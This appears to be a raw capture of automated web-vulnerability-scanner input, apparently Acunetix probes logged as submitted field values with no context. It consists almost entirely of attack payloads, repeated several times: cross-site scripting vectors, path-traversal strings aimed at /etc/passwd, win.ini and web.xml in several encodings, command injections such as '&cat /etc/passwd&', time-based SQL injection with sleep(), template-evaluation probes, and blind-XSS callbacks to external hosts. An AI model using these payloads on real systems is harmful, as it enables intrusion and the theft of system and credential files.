1_xG37Z <ScRiPt >prompt(971175)</ScRiPt>

1

1

'|dir

WEB-INF\web.xml

1

1

1

"|dir

1

../../../../../../../../../../windows/win.ini

1

1

1

1

1

../../../../../../../../../../boot.ini

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

................windowswin.ini

1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

acu4019\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4019

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

acux4626\xc0\xbez1\xc0\xbcz2a\x90bcxuca4626

1

1

1<ScRiPt >prompt(912271)</ScRiPt>

1

response.write(9788724*9525146)

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<script>prompt(977989)</script>

1

1

1

1<ScRiPt >prompt(977514)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

'+response.write(9788724*9525146)+'

1

1

1

&cat /etc/passwd&

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?970344></ScRiPt>

"+response.write(9788724*9525146)+"

1

1<ScRiPt >prompt(975317)</ScRiPt>

1

1

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1<video><source onerror="javascript:prompt(956873)">

1

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(900273)"></g></svg>

1

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

WEB-INF\web.xml

1

1<div style=width:expression(prompt(949256))>

1

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

1

1

1<iframe src='data:text/html

1

1

${99091+99119}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1<body onload=prompt(994854)>

1

1

1

1

1some_inexistent_file_with_long_name%00.jpg

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n919002=v932025

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(968487)>

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1

1

1

'"()

1

'|'ld

!(()&&!|*|*|

1<img src=xyz OnErRor=prompt(994413)>

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1)

1

1

testasp.vulnweb.com

"|"ld

^(#$!@#$)(()))******

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

-1))

1<img/src=">" onerror=alert(971783)>

1

1

1

'

fV60q94S'

1

1

1

1<ScRiPt%20>prompt(997933)</sCripT>

/etc/passwd

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

gTCmeHlZ')

"

1&lt

1

'

1

1

1

${@print(md5(acunetix_wvs_security_test))}

1

YnqIcEyW'))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

acunetix_wvs_invalid_filename

1

${@print(md5(acunetix_wvs_security_test))}\

http://hitrtIQ4kOyvk.bxss.me/

\xf6<img acu onmouseover=prompt(933752) //\xf6>

"

comments

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

-1

1

1

1

1

comments/.

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

http://www.acunetix.tst

||cat /etc/passwd

-1)

1<input autofocus onfocus=prompt(919542)>

1

1'"()&%<ScRiPt >prompt(948026)</ScRiPt>

'"

1

&dir

1

-1))

'"()&%<ScRiPt >prompt(915046)</ScRiPt>

1

1

1

'&dir&'

<!--

<a href='http://www.acunetix.com'>website security</a>

BlLJLd3m'

file:///etc/passwd

1

1_996956

"&dir&"

1

1

[url=http://www.acunetix.com]website security[/url]

/\../\../\../\../\../\../\../etc/passwd

1

LS402MmJ')

|dir

1

1_RavB8 <ScRiPt >prompt(907605)</ScRiPt>

WEB-INF/web.xml

1

1

kySAr9OZ'))

1

'|dir

WEB-INF\web.xml

1

1

1

1

"|dir

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

1

1

acu6104\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6104

../../../../../../../../../../windows/win.ini.jpg

1

1

acux3271\xc0\xbez1\xc0\xbcz2a\x90bcxuca3271

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(937867)</ScRiPt>

1

1

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<script>prompt(985184)</script>

1

response.write(9598779*9918487)

1<ScRiPt >prompt(993705)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

&cat /etc/passwd&

'+response.write(9598779*9918487)+'

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?932066></ScRiPt>

"+response.write(9598779*9918487)+"

'&cat /etc/passwd&'

1

1<ScRiPt >prompt(918968)</ScRiPt>

1

1

SomeCustomInjectedHeader:injected_by_wvs

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

"&cat /etc/passwd&"

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<video><source onerror="javascript:prompt(932072)">

cat /etc/passwd

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

`cat /etc/passwd`

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(990902)"></g></svg>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

WEB-INF/web.xml

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

1<div style=width:expression(prompt(957257))>

1

1

|cat /etc/passwd#

../../../../../../../../../../etc/passwd.jpg

1

${100032+100466}

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

WEB-INF\web.xml

1&n951536=v981112

'|'ld

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<iframe src='data:text/html

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1

1

1

)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<body onload=prompt(928407)>

"|"ld

1

1some_inexistent_file_with_long_name%00.jpg

1

-1)

!(()&&!|*|*|

'"()

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(988458)>

-1))

1

'

1

^(#$!@#$)(()))******

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<img src=xyz OnErRor=prompt(971611)>

1

'

testasp.vulnweb.com

mgw25AnH'

1

1

"

1<img/src=">" onerror=alert(991561)>

1

TmdQvMAK')

1

1

/etc/passwd

1

1<ScRiPt%20>prompt(930840)</sCripT>

1

${@print(md5(acunetix_wvs_security_test))}

"

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

ooA6iEhQ'))

1

1

1

||cat /etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}\

1&lt

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1

http://hitnyOVaxrv5x.bxss.me/

1

1

1

-1)

1

acunetix_wvs_invalid_filename

&dir

\xf6<img acu onmouseover=prompt(950822) //\xf6>

1

-1))

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'&dir&'

1<input autofocus onfocus=prompt(937077)>

1

comments

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

DbufJ8u7'

http://www.acunetix.tst

"&dir&"

<a href='http://www.acunetix.com'>website security</a>

zUIh5h5w')

1

1

1

'"

comments

1

[url=http://www.acunetix.com]website security[/url]

|dir

FNxUPbnr'))

1

1

<!--

'|dir

1_Ltk34 <ScRiPt >prompt(990336)</ScRiPt>

file:///etc/passwd

1'"()&%<ScRiPt >prompt(970961)</ScRiPt>

comments/.

1

"|dir

1

1

1

1

'"()&%<ScRiPt >prompt(978067)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

1

1

1

1_942050

1

1

1

WEB-INF/web.xml

1

1

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

acu8799\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8799

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

acux1776\xc0\xbez1\xc0\xbcz2a\x90bcxuca1776

1

1

1

................windowswin.ini

1<ScRiPt >prompt(972162)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<script>prompt(980195)</script>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1

1<ScRiPt >prompt(921562)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?963195></ScRiPt>

1

1

1<ScRiPt >prompt(945626)</ScRiPt>

WEB-INF/web.xml

1

1

1<video><source onerror="javascript:prompt(915049)">

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(908188)"></g></svg>

WEB-INF\web.xml

1

1

1<div style=width:expression(prompt(916535))>

1

1

1

1<iframe src='data:text/html

1

1

1

1<body onload=prompt(900058)>

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(982496)>

1

1<img src=xyz OnErRor=prompt(964910)>

1<img/src=">" onerror=alert(947914)>

1

1<ScRiPt%20>prompt(951028)</sCripT>

1

1&lt

\xf6<img acu onmouseover=prompt(969978) //\xf6>

1

1<input autofocus onfocus=prompt(946868)>

1

<a href='http://www.acunetix.com'>website security</a>

[url=http://www.acunetix.com]website security[/url]

1

1_YOSC9 <ScRiPt >prompt(995799)</ScRiPt>

1

1

1

1

1

1

1

1

response.write(9060887*9413803)

1

'+response.write(9060887*9413803)+'

1

&cat /etc/passwd&

"+response.write(9060887*9413803)+"

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

cat /etc/passwd

1

1

1

1

`cat /etc/passwd`

../../../../../../../../../../etc/passwd

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

${100180+99726}

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

../../../../../../../../../../etc/passwd.jpg

'|'ld

1some_inexistent_file_with_long_name%00.jpg

-1

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1&n960618=v981849

testasp.vulnweb.com

)

-1)

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'"()

!(()&&!|*|*|

-1))

1

1

^(#$!@#$)(()))******

'

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

sdiiicoz'

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'

1

"

1

1

yEwdQ4Vl')

1

||cat /etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

/etc/passwd

1

1

gebIQtkj'))

1

1

&dir

http://hitl95UpGXy0G.bxss.me/

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

-1

1

${@print(md5(acunetix_wvs_security_test))}\

comments

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'&dir&'

1

-1)

1

1

comments

'"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"&dir&"

1

1'"()&%<ScRiPt >prompt(935543)</ScRiPt>

-1))

<!--

comments/.

1

D7YC8DBU'

'"()&%<ScRiPt >prompt(904113)</ScRiPt>

|dir

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1_913636

1

w2BxMQ5b')

'|dir

1

1

1

RrMivtjk'))

file:///etc/passwd

"|dir

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

WEB-INF/web.xml

1

1

WEB-INF\web.xml

1

../../../../../../../../../../windows/win.ini

1

../../../../../../../../../../boot.ini

acu6581\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6581

1

1

../../../../../../../../../../windows/win.ini.jpg

acux2965\xc0\xbez1\xc0\xbcz2a\x90bcxuca2965

1

1<ScRiPt >prompt(912888)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<script>prompt(953353)</script>

1

1

................windowswin.ini

1

1<ScRiPt >prompt(943957)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?914285></ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(902383)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<video><source onerror="javascript:prompt(909098)">

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(983358)"></g></svg>

1

1

1<div style=width:expression(prompt(960792))>

1

WEB-INF/web.xml

1<iframe src='data:text/html

1

WEB-INF\web.xml

1<body onload=prompt(941815)>

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(956860)>

1

1

1<img src=xyz OnErRor=prompt(918299)>

1

1<img/src=">" onerror=alert(904081)>

1<ScRiPt%20>prompt(943672)</sCripT>

1

1&lt

1

\xf6<img acu onmouseover=prompt(933380) //\xf6>

1

1<input autofocus onfocus=prompt(996330)>

1

<a href='http://www.acunetix.com'>website security</a>

1

[url=http://www.acunetix.com]website security[/url]

1

1_iWCnw <ScRiPt >prompt(931194)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1